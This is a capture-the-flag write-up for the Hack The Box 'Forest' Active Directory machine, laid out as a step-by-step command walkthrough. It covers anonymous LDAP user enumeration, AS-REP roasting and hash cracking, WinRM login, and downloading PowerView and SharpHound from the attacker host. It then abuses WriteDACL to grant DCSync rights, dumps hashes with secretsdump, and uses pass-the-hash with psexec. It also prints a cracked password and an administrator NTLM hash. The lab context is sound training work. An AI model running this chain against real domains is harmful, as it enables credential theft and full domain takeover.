HackTheBoxActiveDirectoryWindowsVulnLabs

Forest

easy level AD machine on HTB

First nmap scan revealed the following ports to be open 53,88,135,139,389,445,464,593,636,3268,3269 Now with this nmap scan we'll get more service and version info

nmap 10.129.95.210 -p53,88,135,139,389,445,464,593,636,3268,3269 -sCV

And the output was

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-28 06:07:00Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-02-28T06:07:20
|_  start_date: 2026-02-28T05:56:49
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2026-02-27T22:07:22-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h46m49s, deviation: 4h37m11s, median: 6m47s

Trying to get anonymous access using SMB failed, but worked on ldap, using

ldapsearch -x -H ldap://10.129.95.210 -s base

Now we'll enumerate users using LDAP anonymous and put them in a list using, this command,

netexec ldap 10.129.95.210 -u '' -p '' --query "(sAMAccountName=*)" "" \                                                                 
  | awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt

and now check for accounts without kerberos pre-auth using

impacket-GetNPUsers htb.local/ -dc-ip 10.129.95.210 -no-pass -usersfile users.txt

now this will give us the AS-rep hash of svc-alfresco, and we will crack it using hashcat, using

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt

The cracked password will be s3rvice. Now there doesnt seem much in the nmap to get a shell, since there is nothing interesting in the smb as well, so i'll try WinRM using

evil-winrm -i 10.129.95.210 -u svc-alfresco -p s3rvice

now get the user flag. Now setup a python server on the attacker machine to get PowerView.ps1, and in WinRM transfer it using

Invoke-WebRequest http://10.10.14.25:8001/PowerView.ps1 -UseBasicParsing -OutFile PowerView.ps1

There wasn't much interesting stuff found using PowerView, so transferring sharphound.exe to ingest data for bloodhound

Invoke-WebRequest http://10.10.14.25:8000/SharpHound.exe -UseBasicParsing -OutFile SharpHound.exe

then run SharpHound

.\SharpHound.exe -c All

Now in bloodhound we see that "Exchange Windows Permissions" have the right to WrtieDACL on domain, so we'll create an account and add it in that group using

net user test123 password123! /add /domain

net group "Exchange Windows Permissions" test123 /add

net localgroup "Remote Management Users" test123 /add

$pass = ConvertTo-SecureString 'password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\test123', $pass)

Add-ObjectACL -PrincipalIdentity test123 - Credential $cred -Rights DCSync

Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity test123 -Rights DCSync -Credential $cred

Now all the requirements are done to execute writeDACL, so using impacket-secretsdump, we'll exploit it

impacket-secretsdump 'htb.local/[email protected]'

this will give the ntlm hash of administrator, which we will use to get shell as Administrator using impacket-psexec

impacket-psexec htb.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

PreviousJobTwo NextTimelapse

Last updated 17 days ago